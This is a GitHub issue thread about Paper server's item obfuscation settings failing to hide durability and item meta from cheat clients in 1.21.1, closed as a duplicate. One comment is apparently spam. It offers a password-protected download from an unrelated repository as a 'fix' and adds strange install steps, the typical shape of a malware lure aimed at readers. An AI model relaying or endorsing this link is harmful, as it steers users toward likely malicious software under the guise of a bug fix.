### ISSUE TITLE
Obfuscation (hide-durability; hide-itemmeta) - Doesn't work

### ISSUE THREAD

**Issue by Pjooo** [PaperSpigot/Paper#11337] opened 2024-08-28 22:38 UTC
### Expected behavior

When obfuscation is on, it should block cheats to be able to look at other player items meta, durability etc.

### Observed/Actual behavior

Currently with items obfuscation set to true, cheats do allow to see items durability and itemmeta in other players inventories.

### Steps/models to reproduce

1. In _paper-world-defaults.yml set:
 `  obfuscation:
    items:
      hide-durability: true
      hide-itemmeta: true
      hide-itemmeta-with-visual-effects: true
`
2. Startup server
3. Using cheats see other players inventories. You'd be avaliable 

### Plugin and Datapack List

No plugins

### Paper version

This server is running Paper version 1.21.1-52-master@e08e667 (2024-08-26T18:02:06Z) (Implementing API version 1.21.1-R0.1-SNAPSHOT)
You are running the latest version

### Other

When testing on 1.20.4 this issue wasn't present. I wasn't able to see players inventory meta on paper 1.20.4

**Comment by louseee** [comment] 2024-08-29 01:24
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Warriorrrr** [comment] 2024-08-29 07:27
Duplicate of #11225

**Closed as not planned by Warriorrrr** 2024-08-29 07:27 UTC
Labels: type: bug, resolution: duplicate, version: 1.21.1
